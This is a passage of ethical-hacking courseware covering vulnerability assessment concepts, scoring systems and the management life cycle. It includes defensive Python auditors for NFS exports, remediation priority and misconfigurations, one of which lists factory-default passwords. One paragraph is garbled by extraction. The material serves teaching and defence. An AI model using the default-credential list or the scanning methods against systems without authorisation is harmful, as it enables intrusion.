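    """Yield (line_no, path, [(client, [options]), ...]) for each export line."""
    for num, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        clients = []
        for token in rest.split():
            if "(" in token:
                client, _, opts = token.partition("(")
                options = [o.strip() for o in opts.rstrip(")").split(",") if o.strip()]
            else:
                client, options = token, []     # exportfs defaults: ro, root_squash
            clients.append((client, options))
        yield num, path, clients


def audit_exports(text: str) -> list:
    findings = []
    for num, path, clients in parse_exports(text):
        for client, options in clients:
            def add(severity, message):
                findings.append(ExportFinding(num, path, client, severity, message))
            if "no_root_squash" in options:
                add("high", "no_root_squash: root on the client is trusted as root on the server")
            if _is_wildcard(client):
                if "rw" in options:
                    add("high", "read-write export to a wildcard client")
                else:
                    add("medium", "export readable by any matching host")
    return findings


# Constructed sample /etc/exports mixing sound and weak entries.
SAMPLE_EXPORTS = "\n".join([
    "# constructed sample /etc/exports",
    "/srv/backup  10.0.0.0/24(rw,sync,root_squash)",
    "/srv/public  *(ro,sync)",
    "/srv/share   *(rw,sync,no_root_squash)",
    "/home        192.168.10.5(rw,sync) 192.168.10.6(rw,no_root_squash)",
])


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"line {f.line} {f.path} [{f.client or '*'}] {f.severity}: {f.message}")
```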
FTP Enumeration Countermeasures
▪ Implement secure FTP (SFTP, which uses SSH) or secure FTP (FTPS, which uses SSL) to encrypt the FTP traffic over the network.
▪ Implement strong passwords or a certification-based authentication policy.
▪ Ensure that the unrestricted uploading of files on the FTP server is not allowed.
▪ Disable anonymous FTP accounts. If this is not possible, monitor anonymous FTP accounts regularly.
▪ Restrict access by IP or domain name to the FTP server.
▪ Configure access controls on authenticated FTP accounts with the help of access control lists (ACLs).
▪ Restrict login attempts and time.
▪ Configure filtering rules for the FTP services.
▪ Use SSL/FTPS for authenticated FTP accounts.

Module Summary
In this module, we discussed the enumeration concepts along with the techniques, services, and ports used for enumeration. We have also discussed how attackers perform different enumeration techniques (NetBIOS, SNMP, LDAP, NTP, NFS, SMTP, DNS, IPsec, VoIP, RPC, Linux/Unix, Telnet, FTP, TFTP, SMB, IPv6, and BGP enumeration) to gather information about the target. This module ended with a detailed discussion on the countermeasures that organizations can adopt to defend against enumeration activities.

In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, perform vulnerability analysis to identify security loopholes in the target organization's network, communication infrastructure, and end systems.

Certified Ethical Hacker

Module 05: Vulnerability Analysis
Module Objectives
In today's world, organizations depend heavily on information technology for protecting vital information. This information is associated with areas of finance, research and development, personnel, legality, and security. Vulnerability assessments scan networks for known security weaknesses. Attackers perform vulnerability analysis to identify security loopholes in the target organization's network, communication infrastructure, and end systems. The identified vulnerabilities are used by attackers to further exploit that target network.

Vulnerability assessment plays a major role in providing security to any organization's resources and infrastructure from various internal and external threats. To secure a network, an administrator needs to perform patch management, install proper antivirus software, check configurations, solve known issues in third-party applications, and troubleshoot hardware with default configurations. All these activities together constitute a vulnerability assessment.

This module starts with an introduction to vulnerability assessment concepts. It also discusses the various vulnerability scoring systems, vulnerability databases, vulnerability management life cycle, and various approaches and tools used to perform vulnerability assessments. This module will provide knowledge about the tools and techniques used by attackers to perform a quality vulnerability analysis. It concludes with an analysis of the vulnerability assessment reports that help an ethical hacker to fix the identified vulnerabilities.

At the end of this module, you will be able to:
▪ Understand vulnerability research, vulnerability assessment, and vulnerability scoring systems
▪ Describe the vulnerability management life cycle (vulnerability assessment phases)
▪ Understand various types of vulnerabilities and vulnerability assessment techniques
▪ Understand different approaches to vulnerability assessment solutions
▪ Describe different characteristics of good vulnerability assessment solutions
▪ Explain different types of vulnerability assessment tools and the criteria for choosing them
▪ Use various vulnerability assessment tools
▪ Generate and analyze vulnerability assessment reports


Vulnerability Assessment Concepts
There are generally two main causes for vulnerable systems in a network: software or hardware misconfiguration and poor programming practices. Attackers exploit these vulnerabilities to perform various types of attacks on organizational resources. This section gives an overview of vulnerability assessment, vulnerability scoring systems, vulnerability databases, and the vulnerability assessment life cycle.


Vulnerability Research
Vulnerability research is the process of analyzing protocols, services, and configurations to discover the vulnerabilities and design flaws that will expose an operating system and its applications to exploit, attack, or misuse.

An administrator needs vulnerability research:
▪ To gather information about security trends, newly discovered threats, attack surfaces, attack vectors and techniques
▪ To find weaknesses in the OS and applications and alert the network administrator before a network attack
▪ To understand information that helps prevent security problems
▪ To know how to recover from a network attack

An ethical hacker needs to keep up with the most recently discovered vulnerabilities and exploits to stay one step ahead of attackers through vulnerability research, which includes:
▪ Discovering the system design faults and weaknesses that might allow attackers to compromise a system
▪ Staying updated about new products and technologies and reading news related to current exploits
▪ Checking underground hacking web sites (Deep and Dark websites) for newly discovered vulnerabilities and exploits
▪ Checking newly released alerts regarding relevant innovations and product improvements for security systems

Security experts and vulnerability scanners classify vulnerabilities by:
▪ Severity level (low, medium, or high)
▪ Exploit range (local or remote)

Ethical hackers need to conduct intense research with the help of information acquired in the footprinting and scanning phases to find vulnerabilities.


Resources for Vulnerability Research
The following are some of the online websites used to perform vulnerability research:
▪ Microsoft Vulnerability Research (MSVR) (https://www.microsoft.com)
▪ Dark Reading (https://www.darkreading.com)
▪ SecurityTracker (https://securitytracker.com)
▪ Trend Micro (https://www.trendmicro.com)
▪ Security Magazine (https://www.securitymagazine.com)
▪ PenTest Magazine (https://pentestmag.com)
▪ SC Magazine (https://www.scmagazine.com)
▪ Exploit Database (https://www.exploit-db.com)
▪ SecurityFocus (https://www.securityfocus.com)
▪ Help Net Security (https://www.helpnetsecurity.com)
▪ HackerStorm (http://www.hackerstorm.co.uk)
▪ Computerworld (https://www.computerworld.com)
▪ WindowsSecurity (http://www.windowsecurity.com)
▪ D'Crypt (https://www.d-crypt.com)


What is Vulnerability Assessment?
A vulnerability assessment is an in-depth examination of the ability of a system or application, including current security procedures and controls, to withstand exploitation. It scans networks for known security weaknesses, and recognizes, measures, and classifies security vulnerabilities in computer systems, networks, and communication channels. It identifies, quantifies, and ranks possible vulnerabilities to threats in a system. Additionally, it assists security professionals in securing the network by identifying security loopholes or vulnerabilities in the current security mechanism before attackers can exploit them.

A vulnerability assessment may be used to:
▪ Identify weaknesses that could be exploited
▪ Predict the effectiveness of additional security measures in protecting information resources from attack

Typically, vulnerability-scanning tools search network segments for IP-enabled devices and enumerate systems, operating systems, and applications to identify vulnerabilities resulting from vendor negligence, system or network administration activities, or day-to-day activities. Vulnerability-scanning software scans the computer against the Common Vulnerability and Exposures (CVE) index and security bulletins provided by the software vendor.

Vulnerability scanners are capable of identifying the following information:
▪ The OS version running on computers or devices
▪ IP and Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports that are listening
▪ Applications installed on computers
▪ Accounts with weak passwords
▪ Files and folders with weak permissions
▪ Default services and applications that might have to be uninstalled
▪ Errors in the security configuration of common applications
▪ Computers exposed to known or publicly reported vulnerabilities
▪ EOL/EOS software information
▪ Missing patches and hotfixes
▪ Weak network configurations and misconfigured or risky ports
▪ Help to verify the inventory of all devices on the network
There are two approaches to network vulnerability scanning:
▪ Active Scanning: The attacker interacts directly with the target network to find vulnerabilities. Active scanning helps in simulating an attack on the target network to uncover vulnerabilities that can be exploited by the attacker.
  Example: An attacker sends probes and specially crafted requests to the target host in the network to identify vulnerabilities.
▪ Passive Scanning: The attacker tries to find vulnerabilities without directly interacting with the target network. The attacker identifies vulnerabilities via information exposed by systems during normal communications. Passive scanning identifies the active operating systems, applications, and ports throughout the target network, monitoring activity to determine its vulnerabilities. This approach provides information about weaknesses but does not provide a path for directly combating attacks.
  Example: An attacker guesses the operating system information, applications, and application and service versions by observing the TCP connection setup and teardown.

Attackers scan for vulnerabilities using tools such as Nessus, Qualys, GFI LanGuard, and OpenVAS. Vulnerability scanning enables an attacker to identify network vulnerabilities, open ports and running services, application and services configuration errors, and application and service vulnerabilities.
Limitations of Vulnerability Assessment
The following are some of the limitations of vulnerability assessments:
▪ Vulnerability-scanning software is limited in its ability to detect vulnerabilities at a given point in time
▪ Vulnerability-scanning software must be updated when new vulnerabilities are discovered or when improvements are made to the software being used
▪ Software is only as effective as the maintenance performed on it by the software vendor and by the administrator who uses it
▪ Vulnerability assessment does not measure the strength of security controls
▪ Vulnerability-scanning software itself is not immune to software engineering flaws that might lead to it missing serious vulnerabilities
▪ Human judgment is needed to analyze the data after scanning and identifying the false positives and false negatives
▪ The methodology used might have an impact on the test results. For example, vulnerability scanning software that runs under the security context of the domain administrator will yield different results than software that runs under the security context of an authenticated or non-authenticated user. Similarly, diverse vulnerability-scanning software packages assess security differently and have unique features. This can influence the assessment results.

Vulnerability Scoring Systems and Databases
Due to the growing severity of cyber-attacks, vulnerability research has become critical as it helps to mitigate the chance of attacks. Vulnerability research provides awareness of advanced techniques to identify flaws or loopholes in the software that can be exploited by attackers. Vulnerability scoring systems and vulnerability databases are used by security analysts to rank information system vulnerabilities and to provide a composite score of the overall severity and risk associated with identified vulnerabilities. Vulnerability databases collect and maintain information about various vulnerabilities present in information systems.

Following are some of the vulnerability scoring systems and databases:
▪ Common Vulnerability Scoring System (CVSS)
▪ Common Vulnerabilities and Exposures (CVE)
▪ National Vulnerability Database (NVD)
▪ Common Weakness Enumeration (CWE)
Common Vulnerability Scoring System (CVSS)
Source: https://www.first.org, https://nvd.nist.gov
CVSS is a published standard that provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. The system's quantitative model ensures repeatable, accurate measurement while enabling users to see the underlying vulnerability characteristics that were used to generate the scores. Thus, CVSS is well suited as a standard measurement system for industries, organizations, and governments that need accurate and consistent vulnerability impact scores. Two common uses of CVSS are prioritizing vulnerability remediation activities and calculating the severity of vulnerabilities discovered on one's systems. The National Vulnerability Database (NVD) provides CVSS scores for almost all known vulnerabilities.

CVSS helps to capture the principal characteristics of a vulnerability and produce a numerical score to reflect its severity. This numerical score can thereafter be translated into a qualitative representation (such as low, medium, high, or critical) to help organizations properly assess and prioritize their vulnerability management processes.

CVSS assessment consists of three metrics for measuring vulnerabilities:
▪ Base Metric: Represents the inherent qualities of a vulnerability
▪ Temporal Metric: Represents the features that continue to change during the lifetime of the vulnerability
▪ Environmental Metric: Represents vulnerabilities that are based on a particular environment or implementation

Each metric sets a score from 1 to 10, with 10 being the most severe. The CVSS score is calculated and generated by a vector string, which represents the numerical score for each group in the form of a block of text. The CVSS calculator ranks the security vulnerabilities and provides the user with information on the overall severity and risk related to the vulnerability.

Severity    Base Score Range
None        0.0
Low         0.1-3.9
Medium      4.0-6.9
High        7.0-8.9
Critical    9.0-10.0
Table 5.1: CVSS v3.0 ratings

Severity    Base Score Range
Low         0.0-3.9
Medium      4.0-6.9
High        7.0-10.0
Table 5.2: CVSS v2.0 ratings

Figure 5.1: Common Vulnerability Scoring System Calculator Version 3 (scoring CVE-2017-0144)
Common Vulnerabilities and Exposures (CVE)
Source: https://cve.mitre.org
CVE® is a publicly available and free-to-use list or dictionary of standardized identifiers for common software vulnerabilities and exposures. The use of CVE Identifiers, or "CVE IDs," which are assigned by CVE Numbering Authorities (CNAs) from around the world, ensures confidence among parties when discussing or sharing information about a unique software or firmware vulnerability. CVE provides a baseline for tool evaluation and enables data exchange for cybersecurity automation. CVE IDs provide a baseline for evaluating the coverage of tools and services so that users can determine which tools are most effective and appropriate for their organization's needs. In short, products and services compatible with CVE provide better coverage, easier interoperability, and enhanced security.

What CVE is:
▪ One identifier for one vulnerability or exposure
▪ One standardized description for each vulnerability or exposure
▪ A dictionary rather than a database
▪ A method for disparate databases and tools to "speak" the same language
▪ The way to interoperability and better security coverage
▪ A basis for evaluation among services, tools, and databases
▪ Free for the public to download and use
▪ Industry-endorsed via the CVE Numbering Authorities, CVE Board, and the numerous products and services that include CVE

Figure 5.2: Common Vulnerabilities and Exposures (CVE)
National Vulnerability Database (NVD)
Source: https://nvd.nist.gov
The NVD is the U.S. government repository of standards-based vulnerability management data. It uses the Security Content Automation Protocol (SCAP). Such data enable the automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics.

The NVD performs an analysis on CVEs that have been published to the CVE Dictionary. NVD staff are tasked with the analysis of CVEs by aggregating data points from the description, references supplied, and any supplemental data that are publicly available. This analysis results in association impact metrics (Common Vulnerability Scoring System, CVSS), vulnerability types (Common Weakness Enumeration, CWE), and applicability statements (Common Platform Enumeration, CPE), as well as other pertinent metadata. The NVD does not actively perform vulnerability testing; it relies on vendors, third party security researchers, and vulnerability coordinators to provide information that is used to assign these attributes.

Figure 5.3: Screenshot showing CVE details (CVE-2019-6452) in the National Vulnerability Database (NVD)
Common Weakness Enumeration (CWE)
Source: https://cwe.mitre.org
Common Weakness Enumeration (CWE) is a category system for software vulnerabilities and weaknesses. It is sponsored by the National Cybersecurity FFRDC, which is owned by The MITRE Corporation, with support from US-CERT and the National Cyber Security Division of the U.S. Department of Homeland Security. The latest version 3.2 of the CWE standard was released in January 2019. It has over 600 categories of weaknesses, which gives CWE the ability to be effectively employed by the community as a baseline for weakness identification, mitigation, and prevention efforts. It also has an advanced search technique where attackers can search and view weaknesses based on research concepts, development concepts, and architectural concepts.

Figure 5.4: Screenshot showing CWE results for an SMB query
Vulnerability-Management Life Cycle
The vulnerability management life cycle is an important process that helps identify and remediate security weaknesses before they can be exploited. This includes defining the risk posture and policies for an organization, creating a complete asset list of systems, scanning and assessing the environment for vulnerabilities and exposures, and taking action to mitigate the vulnerabilities that are identified. The implementation of a vulnerability management life cycle helps gain a strategic perspective regarding possible cybersecurity threats and renders insecure computing environments more resilient to attacks.

Vulnerability management should be implemented in every organization as it evaluates and controls the risks and vulnerabilities in the system. The management process continuously examines the IT environments for vulnerabilities and risks associated with the system. Organizations should maintain a proper vulnerability management program to ensure overall information security. Vulnerability management provides the best results when it is implemented in a sequence of well-organized phases.

The phases involved in vulnerability management are:
▪ Identify Assets and Create a Baseline
  This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of each system. This creates a good baseline for vulnerability management. This phase involves the gathering of information about the identified systems to understand the approved ports, software, drivers, and basic configuration of each system in order to develop and maintain a system baseline.

Vulnerability
Scan
Thisphase is verycruciali n vulnerability management. analyst
In this step,the security
performsthe vulnerability scan on the network to identify
the knownvulnerabilitiesi n
the organization’s
infrastructure.Vulnerability scans can also be performed on
applicable
compliance templates to assess the organization's
Infrastructureweaknesses
the respective
against compliance guidelines.
- Risk Assessment

  In this phase, all serious uncertainties that are associated with the system are assessed and remediation is planned and prioritized, to permanently eliminate system flaws. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. It determines whether the risk level for a particular asset is high, moderate, or low. Remediation is planned based on the determined risk level. For example, vulnerabilities ranked high-risk are targeted first to decrease the chances of exploitation that would adversely impact the organization.
- Remediation

  Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps.

- Verification

  In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. This phase provides clear visibility into the firm and allows the security team to check whether all the previous phases have been perfectly employed or not. Verification can be performed by using various means such as ticketing systems, scanners, and reports.
- Monitor

  Organizations need to perform regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved. As per security best practices, all phases of vulnerability management must be performed regularly.
Pre-Assessment Phase: Identify Assets and Create a Baseline
The pre-assessment phase is a preparatory phase, which involves defining policies and standards, clarifying the scope of the assessment, designing appropriate information protection procedures, and identifying and prioritizing critical assets to create a good baseline for vulnerability management. The following are the steps involved in creating a baseline:
1. Identify and understand business processes
2. Identify the applications, data, and services that support the business processes and perform code reviews
3. Identify the approved software, drivers, and basic configuration of each system
4. Create an inventory of all assets, and prioritize or rank the critical assets
5. Understand the network architecture and map the network infrastructure
6. Identify the controls already in place
7. Understand policy implementation and practice standard compliance with business processes
8. Define the scope of the assessment
9. Create information protection procedures to support effective planning, scheduling, coordination, and logistics

Classify the identified assets according to the business needs. Classification helps to identify the high business risks in an organization. Prioritize the rated assets based on the impact of their failure and their reliability in the business. Prioritization helps:

- Evaluate and decide a solution for the risk
- Examine the tolerance level for the consequence of the assets failing
- Organize methods for prioritizing the assets

Vulnerability Assessment Phase
The vulnerability assessment phase refers to identifying vulnerabilities in the organization's infrastructure, including the operating system, web applications, and web server. It helps identify the category of the vulnerability and criticality in an organization and minimizes the level of risk. The ultimate goal of vulnerability scanning is to scan, examine, evaluate, and report the vulnerabilities in the organization's information system.

The assessment phase involves examining the architecture of the network, evaluating threats to the environment, performing penetration testing, examining and evaluating physical security, analyzing physical assets, assessing operational security, observing policies and procedures, and assessing the infrastructure's interdependencies.

Steps involved in the assessment phase:

- Examine and evaluate the physical security
- Check for misconfigurations and human errors
- Run vulnerability scans using tools
- Select the type of scan based on the organization or compliance requirements
- Identify and prioritize vulnerabilities
- Identify false positives and false negatives
- Apply the business and technology context to scanner results
- Perform OSINT information gathering to validate the vulnerabilities
- Create a vulnerability scan report

Post-Assessment Phase
The post-assessment phase, also known as the recommendation phase, is performed after and based on risk assessment. Risk characterization is categorized by key criteria, which helps prioritize the list of recommendations.

The tasks performed in the post-assessment phase include:

- Creating a priority list for assessment recommendations based on the impact analysis
- Developing an action plan to implement the proposed remediation
- Capturing lessons learned to improve the complete process in the future
- Conducting training for employees

Post assessment includes risk assessment, remediation, verification, and monitoring.
Risk Assessment

In the risk assessment phase, risks are identified, characterized, and classified along with the techniques used to control or reduce their impact. It is an important step toward identifying security weaknesses in the IT architecture of an organization.

The tasks performed in the risk assessment phase include:

- Perform risk categorization based on risk ranking (for example, critical, high, medium, and low)
- Assess the level of impact
- Determine the threat and risk levels

Remediation

Remediation refers to the steps taken to mitigate the identified vulnerabilities. These include steps like evaluating vulnerabilities, locating risks, and designing responses for vulnerabilities. It is important for the remediation process to be specific, measurable, attainable, relevant, and time-bound.

The tasks performed in the remediation phase include:

- Prioritize remediation based on the risk ranking
- Develop an action plan to implement the recommendation or remediation
- Perform a root-cause analysis
- Apply patches and fixes
- Capture lessons learned
- Conduct awareness training
- Perform exception handling and risk acceptance for the vulnerabilities that cannot be remediated

Verification

The verification phase helps security analysts verify the applied fixes that remediate a vulnerability by re-scanning the systems. In this phase, security analysts also verify whether all previous phases have been perfectly implemented. This phase includes the verification of the remedies used to mitigate risks.

The tasks performed in the verification phase include:

- Rescanning systems to identify if an applied fix is effective in remediating the vulnerability
- Performing dynamic analysis
- Reviewing the attack surface

Monitoring

This phase performs incident monitoring using tools such as IDS/IPS, SIEM, and firewall. It implements continuous security monitoring to thwart ever-evolving threats.

The tasks performed in the monitoring phase include:

- Periodic vulnerability scan
- Timely assessment and remediation of identified vulnerabilities
- Monitoring intrusion detection and intrusion prevention logs
- Implementing policies, procedures, and controls
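The risk ranking, remediation and verification tasks described above can be scripted against scanner output. The following Python example is added here and is not EC-Council's code: it weights each finding's CVSS score by a constructed asset-criticality table taken from the baseline, orders the remediation plan by that weighted risk, and then compares the baseline scan with a re-scan to separate remediated, outstanding, risk-accepted and newly introduced findings. The host names, vulnerability identifiers, scores and criticality values are all constructed for the demo; the identifiers are placeholders, not real advisories.

```python
"""Prioritize findings by risk and verify remediation with a re-scan.

Added example, not EC-Council's code. Host names, vulnerability ids,
scores and asset criticality values are constructed for the demo.
"""
from dataclasses import dataclass

# Asset criticality from the pre-assessment baseline (constructed values):
# a multiplier for the business impact of that asset being compromised.
ASSET_CRITICALITY = {
    "db-01.example.test": 3.0,     # holds regulated data
    "web-01.example.test": 2.0,    # Internet-facing
    "kiosk-07.example.test": 1.0,  # isolated, low value
}


@dataclass(frozen=True, order=True)
class Finding:
    asset: str
    vuln_id: str   # placeholder identifier, not a real advisory
    cvss: float    # scanner-reported base score, 0.0-10.0


def severity_band(cvss: float) -> str:
    """Qualitative rating bands used by CVSS v3 (None/Low/Medium/High/Critical)."""
    if cvss == 0.0:
        return "None"
    if cvss < 4.0:
        return "Low"
    if cvss < 7.0:
        return "Medium"
    if cvss < 9.0:
        return "High"
    return "Critical"


def risk_score(finding: Finding) -> float:
    """Weight the scanner score by asset criticality (constructed scheme).

    Assets missing from the inventory default to weight 1.0 so that a gap
    in the baseline never silently drops a finding from the plan.
    """
    return round(finding.cvss * ASSET_CRITICALITY.get(finding.asset, 1.0), 1)


def prioritize(findings):
    """Return findings ordered for the remediation plan: highest risk first."""
    return sorted(findings, key=lambda f: (-risk_score(f), f))


def verify_remediation(baseline, rescan, accepted=frozenset()):
    """Compare the baseline scan with the re-scan taken after fixes were applied.

    accepted: vulnerability ids that went through exception handling and
    risk acceptance; they are reported separately, not as outstanding.
    """
    before, after = set(baseline), set(rescan)
    still_present = before & after
    return {
        "remediated": sorted(before - after),
        "outstanding": sorted(f for f in still_present if f.vuln_id not in accepted),
        "accepted": sorted(f for f in still_present if f.vuln_id in accepted),
        "new": sorted(after - before),
    }


# Constructed baseline scan results (assessment phase).
BASELINE = [
    Finding("web-01.example.test", "VULN-0001", 9.8),
    Finding("db-01.example.test", "VULN-0002", 7.5),
    Finding("kiosk-07.example.test", "VULN-0003", 9.1),
    Finding("web-01.example.test", "VULN-0004", 5.3),
]

# Constructed re-scan after remediation: web-01 was patched, db-01 was not,
# the kiosk cannot be patched (risk accepted), and web-01 picked up a new
# finding since the baseline.
RESCAN = [
    Finding("db-01.example.test", "VULN-0002", 7.5),
    Finding("kiosk-07.example.test", "VULN-0003", 9.1),
    Finding("web-01.example.test", "VULN-0005", 6.1),
]

if __name__ == "__main__":
    for f in prioritize(BASELINE):
        print(f"{risk_score(f):5.1f}  {severity_band(f.cvss):8}  {f.asset}  {f.vuln_id}")
    for status, items in verify_remediation(BASELINE, RESCAN, accepted={"VULN-0003"}).items():
        print(status, [f.vuln_id for f in items])
```

Note how the weighting reorders the plan relative to raw scores: the 7.5 on the database server goes first, while the 9.1 on the isolated kiosk drops to the bottom and is then carried as an accepted exception rather than an open item.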

Module Flow

Vulnerability Classification and Assessment Types

Any vulnerability that is present in a system can be hazardous and can cause severe damage to the organization. It is important for ethical hackers to have knowledge about various types of vulnerabilities that they can employ, along with various vulnerability assessment techniques. This section in the module discusses the various types of vulnerabilities and vulnerability assessments.

Vulnerability Classification

Vulnerabilities present in a system or network are classified into the following categories:
- Misconfiguration

  Misconfiguration is the most common vulnerability and is mainly caused by human error, which allows attackers to gain unauthorized access to the system. It may happen intentionally or unintentionally and affects web servers, application platforms, databases, and networks. The following are some examples of misconfiguration:

  o An application running with debug enabled
  o Unnecessary administrative ports that are open for an application
  o Running outdated software on the system
  o Running unnecessary services on a machine
  o Outbound connections to various Internet services
  o Using misconfigured SSL certificates or default certificates
  o Improperly authenticated external systems
  o Incorrect folder permissions
  o Default accounts or passwords
  o Setup or configuration pages enabled
  o Disabling security settings and features

  Attackers can easily detect these misconfigurations using scanning tools and then exploit the backend systems. Therefore, the administrators must change the default configuration of devices and optimize device security.
- Default Installations

  Default installations are usually user-friendly, especially when the device is being used for the first time, when the primary concern is the usability of the device rather than the device's security. In some cases, infected devices may not contain any valuable information, but are connected to networks or systems that have confidential information that would result in a data breach. Failing to change the default settings while deploying the software or hardware allows the attacker to guess the settings to break into the system.
- Buffer Overflows

  Buffer overflows are common software vulnerabilities that happen due to coding errors that allow attackers to gain access to the target system. In a buffer overflow attack, the attackers undermine the functioning of programs and try to take control of the system by writing content beyond the allocated size of the buffer. Insufficient bounds checking in the program is the root cause. The buffer is not able to handle data beyond its limit, causing the flow of data to adjacent memory locations and overwriting their data values. Systems often crash, become unstable, or show erratic program behavior when a buffer overflow occurs.
- Unpatched Servers

  Servers are an essential component of the infrastructure of any organization. There are several cases where organizations run unpatched and misconfigured servers that compromise the security and integrity of the data in their system. Hackers look out for these vulnerabilities in the servers and exploit them. As these unpatched servers are a hub for the attackers, they serve as an entry point into the network. This can lead to the exposure of private data, financial loss, and discontinuation of operations. Updating and maintaining systems properly by patching software regularly and fixing bugs can help in mitigating the vulnerabilities caused by unpatched servers.

- Design Flaws

  Vulnerabilities due to design flaws are universal to all operating devices and systems. Design vulnerabilities such as incorrect encryption or the poor validation of data refer to logical flaws in the functionality of the system that attackers exploit to bypass the detection mechanism and acquire access to a secure system.

- Operating System Flaws

  Due to vulnerabilities in the operating systems, applications such as trojans, worms, and viruses pose threats. These attacks use malicious code, script, or unwanted software, which results in the loss of sensitive information and control of computer operations. Timely patching of the OS, installing minimal software applications, and using

  applications with firewall capabilities are essential steps that an administrator must take to protect the OS from attacks.
- Application Flaws

  Application flaws are vulnerabilities in applications that are exploited by the attackers. Applications should be secured using the validation and authorization of the user. Flawed applications pose security threats such as data tampering and unauthorized access to configuration stores. If the applications are not secured, sensitive information may be lost or corrupted. Hence, developers must understand the anatomy of common security vulnerabilities and develop highly secure applications by providing proper user validation and authorization.

- Open Services

  Open ports and services may lead to the loss of data or DoS attacks and allow attackers to perform further attacks on other connected devices. Administrators must continuously check for unnecessary or insecure ports and services to reduce the risk to the network.
- Default Passwords

  Manufacturers provide users with default passwords to access the device during its initial set-up, which users must change for future use. When users forget to update the passwords and continue using the default passwords, they make devices and systems vulnerable to various attacks, such as brute force and dictionary attacks. Attackers exploit this vulnerability to obtain access to the system. Passwords should be kept confidential; failing to protect the confidentiality of a password allows the system to be easily compromised.
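Several of the misconfiguration and default-password conditions listed above can be checked mechanically before a device or application goes into production. The following Python script is an added example, not part of the courseware: it audits an INI-style application configuration for debug mode, an administrative interface bound to every interface, factory-default credentials, an enabled setup page, a self-signed (default) certificate, a world-writable upload folder and a disabled security feature. The configuration format, the section and key names, the default-credential list and both sample configurations are constructed for the demo; a real audit maps the same checks onto the product's own settings.

```python
"""Audit an application configuration for common misconfigurations.

Added example, not EC-Council's code. The INI layout, section/key names,
default-credential list and the two sample configurations are constructed.
"""
import configparser

# Constructed list of factory-default credential pairs to flag.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "password"), ("root", "toor")}


def audit_config(text: str) -> list:
    """Return the ids of the checks that failed, in a fixed order."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    failed = []

    # Application running with debug enabled
    if cfg.getboolean("app", "debug", fallback=False):
        failed.append("DEBUG_ENABLED")
    # Setup or configuration page left enabled
    if cfg.getboolean("app", "setup_page", fallback=False):
        failed.append("SETUP_PAGE_ENABLED")
    # Administrative port reachable on every interface; an unset bind
    # address is treated as "all interfaces" (assumed product default)
    if cfg.get("admin", "bind_address", fallback="0.0.0.0") == "0.0.0.0":
        failed.append("ADMIN_PORT_EXPOSED")
    # Default account or password still in use
    creds = (cfg.get("admin", "username", fallback=""),
             cfg.get("admin", "password", fallback=""))
    if creds in DEFAULT_CREDENTIALS:
        failed.append("DEFAULT_CREDENTIALS")
    # Default or self-signed certificate: issuer equals subject
    subject = cfg.get("tls", "subject", fallback="")
    if subject and subject == cfg.get("tls", "issuer", fallback=""):
        failed.append("SELF_SIGNED_CERT")
    # Incorrect folder permissions: upload directory writable by everyone
    mode = int(cfg.get("storage", "upload_dir_mode", fallback="0750"), 8)
    if mode & 0o002:
        failed.append("WORLD_WRITABLE_DIR")
    # Security feature switched off
    if not cfg.getboolean("app", "csrf_protection", fallback=True):
        failed.append("SECURITY_FEATURE_DISABLED")
    return failed


# Constructed configuration as shipped: every check fails.
WEAK_CONFIG = """
[app]
debug = true
setup_page = true
csrf_protection = false

[admin]
bind_address = 0.0.0.0
listen_port = 8080
username = admin
password = admin

[tls]
subject = CN=app.example.test
issuer = CN=app.example.test

[storage]
upload_dir_mode = 0777
"""

# Constructed hardened configuration: no check fails.
HARDENED_CONFIG = """
[app]
debug = false
setup_page = false
csrf_protection = true

[admin]
bind_address = 127.0.0.1
listen_port = 8080
username = ops-admin
password = ${ADMIN_PASSWORD}

[tls]
subject = CN=app.example.test
issuer = CN=Example Internal CA

[storage]
upload_dir_mode = 0750
"""

if __name__ == "__main__":
    print("as shipped:", audit_config(WEAK_CONFIG))
    print("hardened:  ", audit_config(HARDENED_CONFIG))
```

The checks deliberately fail closed on missing values: a configuration that never mentions the administrative bind address is reported as exposed, because the safe assumption during an audit is that an unset option takes the permissive default.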

Types of Vulnerability Assessment

Given below are the different types of vulnerability assessments:
- Active Assessment

  A type of vulnerability assessment that uses network scanners to identify the hosts, services, and vulnerabilities present in a network. Active network scanners can reduce the intrusiveness of the checks they perform.

- Passive Assessment

  Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network.

- External Assessment

  External assessment examines the network from a hacker's point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers. An external assessment estimates the threat of network security attacks from outside the organization. It determines the level of security of the external network and firewall. The following are some of the possible steps in performing an external assessment:

  o Determine a set of rules for firewall and router configurations for the external network
  o Check whether the external server devices and network devices are mapped
  o Identify open ports and related services on the external network
  o Examine the patch levels on the server and external network devices
  o Review detection systems such as IDS, firewalls, and application-layer protection systems
  o Get information on DNS zones
  o Scan the external network through a variety of proprietary tools available on the Internet
  o Examine Web applications such as e-commerce and shopping cart software for vulnerabilities
- Internal Assessment

  An internal assessment involves scrutinizing the internal network to find exploits and vulnerabilities. The following are some of the possible steps in performing an internal assessment:

  o Specify the open ports and related services on network devices, servers, and systems
  o Check the router configurations and firewall rulesets
  o List the internal vulnerabilities of the operating system and server
  o Scan for any trojans that may be present in the internal environment
  o Check the patch levels on the organization's internal network devices, servers, and systems
  o Check for the existence of malware, spyware, and virus activity and document them

  o Evaluate the physical security
  o Identify and review the remote management process and events
  o Assess the file-sharing mechanisms (for example, NFS and SMB/CIFS shares)
  o Examine the antivirus implementation and events
- Host-based Assessment

